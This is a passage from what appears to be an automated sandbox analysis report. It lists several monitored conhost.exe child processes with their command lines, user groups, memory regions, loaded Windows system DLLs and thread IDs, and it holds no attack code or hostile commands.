"NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1997 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1998 start_va = 0x48ad560000 end_va = 0x48ad57ffff entry_point = 0x0 region_type = private name = "private_0x00000048ad560000" filename = "" Region: id = 1999 start_va = 0x48ad580000 end_va = 0x48ad593fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000048ad580000" filename = "" Region: id = 2000 start_va = 0x48ad5a0000 end_va = 0x48ad5dffff entry_point = 0x0 region_type = private name = "private_0x00000048ad5a0000" filename = "" Region: id = 2001 start_va = 0x7df5ffee0000 end_va = 0x7ff5ffedffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffee0000" filename = "" Region: id = 2002 start_va = 0x7ff6c3a60000 end_va = 0x7ff6c3a82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3a60000" filename = "" Region: id = 2003 start_va = 0x7ff6c3a83000 end_va = 0x7ff6c3a83fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a83000" filename = "" Region: id = 2004 start_va = 0x7ff6c3a8e000 end_va = 0x7ff6c3a8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a8e000" filename = "" Region: id = 2005 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2006 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2007 start_va = 0x48ad700000 end_va = 0x48ad7fffff entry_point = 0x0 region_type = private name = "private_0x00000048ad700000" filename = "" Region: id = 2008 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2009 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2427 start_va = 0x48ad560000 end_va = 0x48ad56ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000048ad560000" filename = "" Region: id = 2428 start_va = 0x48ad570000 end_va = 0x48ad576fff entry_point = 0x0 region_type = private name = "private_0x00000048ad570000" filename = "" Region: id = 2429 start_va = 0x48ad5e0000 end_va = 0x48ad69dfff entry_point = 0x48ad5e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2430 start_va = 0x48ad6a0000 end_va = 0x48ad6dffff entry_point = 0x0 region_type = private name = "private_0x00000048ad6a0000" filename = "" Region: id = 2431 start_va = 0x48ad6e0000 end_va = 0x48ad6e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000048ad6e0000" filename = "" Region: id = 2432 start_va = 0x48ad6f0000 end_va = 0x48ad6f6fff entry_point = 0x0 region_type = private name = "private_0x00000048ad6f0000" filename = "" Region: id = 2433 start_va = 0x48ad800000 end_va = 0x48ad987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000048ad800000" filename = "" Region: id = 2434 start_va = 0x48ad990000 end_va = 0x48ad990fff entry_point = 0x0 region_type = private name = "private_0x00000048ad990000" filename = "" Region: id = 2435 start_va = 0x48ad9a0000 end_va = 0x48ad9a0fff entry_point = 0x0 region_type = private name = "private_0x00000048ad9a0000" filename = "" Region: id = 2436 start_va = 0x48ad9d0000 end_va = 0x48ad9dffff entry_point = 0x0 region_type = private name = "private_0x00000048ad9d0000" filename = "" Region: id = 2437 start_va = 0x48ad9e0000 end_va = 0x48adb60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000048ad9e0000" filename = "" Region: id = 2438 start_va = 0x48adb70000 end_va = 0x48aef6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000048adb70000" filename = "" Region: id = 2439 start_va = 0x7ff6c3960000 end_va = 0x7ff6c3a5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3960000" filename = "" Region: id = 2440 start_va = 0x7ff6c3a8c000 end_va = 0x7ff6c3a8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a8c000" filename = "" Region: id = 2441 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2442 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2443 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2444 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2445 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2446 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2447 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2448 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2449 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2450 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2451 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2452 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 124 os_tid = 0xecc Thread: id = 169 os_tid = 0xff0 Thread: id = 200 os_tid = 0x100c Thread: id = 270 os_tid = 0x1168 Process: id = "94" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf79a000" os_pid = "0xed0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0xd6c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2010 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2011 start_va = 0xd3b7c60000 end_va = 0xd3b7c7ffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7c60000" filename = "" Region: id = 2012 start_va = 0xd3b7c80000 end_va = 0xd3b7c93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3b7c80000" filename = "" Region: id = 2013 start_va = 0xd3b7ca0000 end_va = 0xd3b7cdffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7ca0000" filename = "" Region: id = 2014 start_va = 0x7df5ffd70000 end_va = 0x7ff5ffd6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd70000" filename = "" Region: id = 2015 start_va = 0x7ff6c3b10000 end_va = 0x7ff6c3b32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3b10000" filename = "" Region: id = 2016 start_va = 0x7ff6c3b35000 end_va = 0x7ff6c3b35fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3b35000" filename = "" Region: id = 2017 start_va = 0x7ff6c3b3e000 end_va = 0x7ff6c3b3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3b3e000" filename = "" Region: id = 2018 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2019 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2020 start_va = 0xd3b7e80000 end_va = 0xd3b7f7ffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7e80000" filename = "" Region: id = 2021 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2022 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3342 start_va = 0xd3b7c60000 end_va = 0xd3b7c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3b7c60000" filename = "" Region: id = 3343 start_va = 0xd3b7c70000 end_va = 0xd3b7c76fff entry_point = 0x0 region_type = private name = "private_0x000000d3b7c70000" filename = "" Region: id = 3344 start_va = 0xd3b7ce0000 end_va = 0xd3b7d9dfff entry_point = 0xd3b7ce0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3345 start_va = 0xd3b7da0000 end_va = 0xd3b7ddffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7da0000" filename = "" Region: id = 3346 start_va = 0xd3b7de0000 end_va = 0xd3b7de0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3b7de0000" filename = "" Region: id = 3347 start_va = 0xd3b7df0000 end_va = 0xd3b7df6fff entry_point = 0x0 region_type = private name = "private_0x000000d3b7df0000" filename = "" Region: id = 3348 start_va = 0xd3b7e00000 end_va = 0xd3b7e00fff entry_point = 0x0 region_type = private name = "private_0x000000d3b7e00000" filename = "" Region: id = 3349 start_va = 0xd3b7e10000 end_va = 0xd3b7e10fff entry_point = 0x0 region_type = private name = "private_0x000000d3b7e10000" filename = "" Region: id = 3350 start_va = 0xd3b80e0000 end_va = 0xd3b80effff entry_point = 0x0 region_type = private name = "private_0x000000d3b80e0000" filename = "" Region: id = 3351 start_va = 0xd3b80f0000 end_va = 0xd3b8277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3b80f0000" filename = "" Region: id = 3352 start_va = 0xd3b8280000 end_va = 0xd3b8400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3b8280000" filename = "" Region: id = 3353 start_va = 0xd3b8410000 end_va = 0xd3b980ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d3b8410000" filename = "" Region: id = 3354 start_va = 0x7ff6c3a10000 end_va = 0x7ff6c3b0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3a10000" filename = "" Region: id = 3355 start_va = 0x7ff6c3b3c000 end_va = 0x7ff6c3b3dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3b3c000" filename = "" Region: id = 3356 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3357 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3358 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3359 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3360 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3361 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3362 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3363 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3364 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3365 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3366 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3367 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4144 start_va = 0xd3b7cb0000 end_va = 0xd3b7cbffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7cb0000" filename = "" Region: id = 4145 start_va = 0xd3b7e20000 end_va = 0xd3b7e5ffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7e20000" filename = "" Region: id = 4146 start_va = 0xd3b7f80000 end_va = 0xd3b7fbffff entry_point = 0x0 region_type = private name = "private_0x000000d3b7f80000" filename = "" Region: id = 4147 start_va = 0xd3b8040000 end_va = 0xd3b804ffff entry_point = 0x0 region_type = private name = "private_0x000000d3b8040000" filename = "" Region: id = 4148 start_va = 0xd3b9810000 end_va = 0xd3b9b46fff entry_point = 0xd3b9810000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4149 start_va = 0xd3b9b50000 end_va = 0xd3b9d64fff entry_point = 0x0 region_type = private name = "private_0x000000d3b9b50000" filename = "" Region: id = 4150 start_va = 0xd3b9d70000 end_va = 0xd3b9f89fff entry_point = 0x0 region_type = private name = "private_0x000000d3b9d70000" filename = "" Region: id = 4151 start_va = 0xd3b9f90000 end_va = 0xd3ba0a1fff entry_point = 0x0 region_type = private name = "private_0x000000d3b9f90000" filename = "" Region: id = 4152 start_va = 0xd3ba0b0000 end_va = 0xd3ba2cdfff entry_point = 0x0 region_type = private name = "private_0x000000d3ba0b0000" filename = "" Region: id = 4153 start_va = 0xd3ba2d0000 end_va = 0xd3ba3ddfff entry_point = 0x0 region_type = private name = "private_0x000000d3ba2d0000" filename = "" Region: id = 4154 start_va = 0x7ff6c3b3a000 end_va = 0x7ff6c3b3bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3b3a000" filename = "" Region: id = 4155 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4156 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4157 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4158 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4159 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4160 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4161 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4162 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4163 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 125 os_tid = 0xed4 Thread: id = 170 os_tid = 0xff4 Thread: id = 237 os_tid = 0x10b8 Thread: id = 281 os_tid = 0x1194 Process: id = "95" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf79e000" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0xd74" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2023 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2024 start_va = 0xf3a67e0000 end_va = 0xf3a67fffff entry_point = 0x0 region_type = private name = "private_0x000000f3a67e0000" filename = "" Region: id = 2025 start_va = 0xf3a6800000 end_va = 0xf3a6813fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f3a6800000" filename = "" Region: id = 2026 start_va = 0xf3a6820000 end_va = 0xf3a685ffff entry_point = 0x0 region_type = private name = "private_0x000000f3a6820000" filename = "" Region: id = 2027 start_va = 0x7df5fff00000 end_va = 0x7ff5ffefffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff00000" filename = "" Region: id = 2028 start_va = 0x7ff6c47d0000 end_va = 0x7ff6c47f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47d0000" filename = "" Region: id = 2029 start_va = 0x7ff6c47f9000 end_va = 0x7ff6c47f9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47f9000" filename = "" Region: id = 2030 start_va = 0x7ff6c47fe000 end_va = 0x7ff6c47fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47fe000" filename = "" Region: id = 2031 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2032 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2033 start_va = 0xf3a68f0000 end_va = 0xf3a69effff entry_point = 0x0 region_type = private name = "private_0x000000f3a68f0000" filename = "" Region: id = 2034 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2035 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2453 start_va = 0xf3a67e0000 end_va = 0xf3a67effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f3a67e0000" filename = "" Region: id = 2454 start_va = 0xf3a67f0000 end_va = 0xf3a67f6fff entry_point = 0x0 region_type = private name = "private_0x000000f3a67f0000" filename = "" Region: id = 2455 start_va = 0xf3a6860000 end_va = 0xf3a689ffff entry_point = 0x0 region_type = private name = "private_0x000000f3a6860000" filename = "" Region: id = 2456 start_va = 0xf3a68a0000 end_va = 0xf3a68a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f3a68a0000" filename = "" Region: id = 2457 start_va = 0xf3a68b0000 end_va = 0xf3a68b6fff entry_point = 0x0 region_type = private name = "private_0x000000f3a68b0000" filename = "" Region: id = 2458 start_va = 0xf3a68c0000 end_va = 0xf3a68c0fff entry_point = 0x0 region_type = private name = "private_0x000000f3a68c0000" filename = "" Region: id = 2459 start_va = 0xf3a68d0000 end_va = 0xf3a68d0fff entry_point = 0x0 region_type = private name = "private_0x000000f3a68d0000" filename = "" Region: id = 2460 start_va = 0xf3a69f0000 end_va = 0xf3a6aadfff entry_point = 0xf3a69f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2461 start_va = 0xf3a6ab0000 end_va = 0xf3a6c37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f3a6ab0000" filename = "" Region: id = 2462 start_va = 0xf3a6c40000 end_va = 0xf3a6c4ffff entry_point = 0x0 region_type = private name = "private_0x000000f3a6c40000" filename = "" Region: id = 2463 start_va = 0xf3a6c50000 end_va = 0xf3a6dd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f3a6c50000" filename = "" Region: id = 2464 start_va = 0xf3a6de0000 end_va = 0xf3a81dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f3a6de0000" filename = "" Region: id = 2465 start_va = 0x7ff6c46d0000 end_va = 0x7ff6c47cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c46d0000" filename = "" Region: id = 2466 start_va = 0x7ff6c47fc000 end_va = 0x7ff6c47fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47fc000" filename = "" Region: id = 2467 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2468 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2469 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2470 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2471 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2472 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2473 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2474 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2475 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2476 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2477 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = 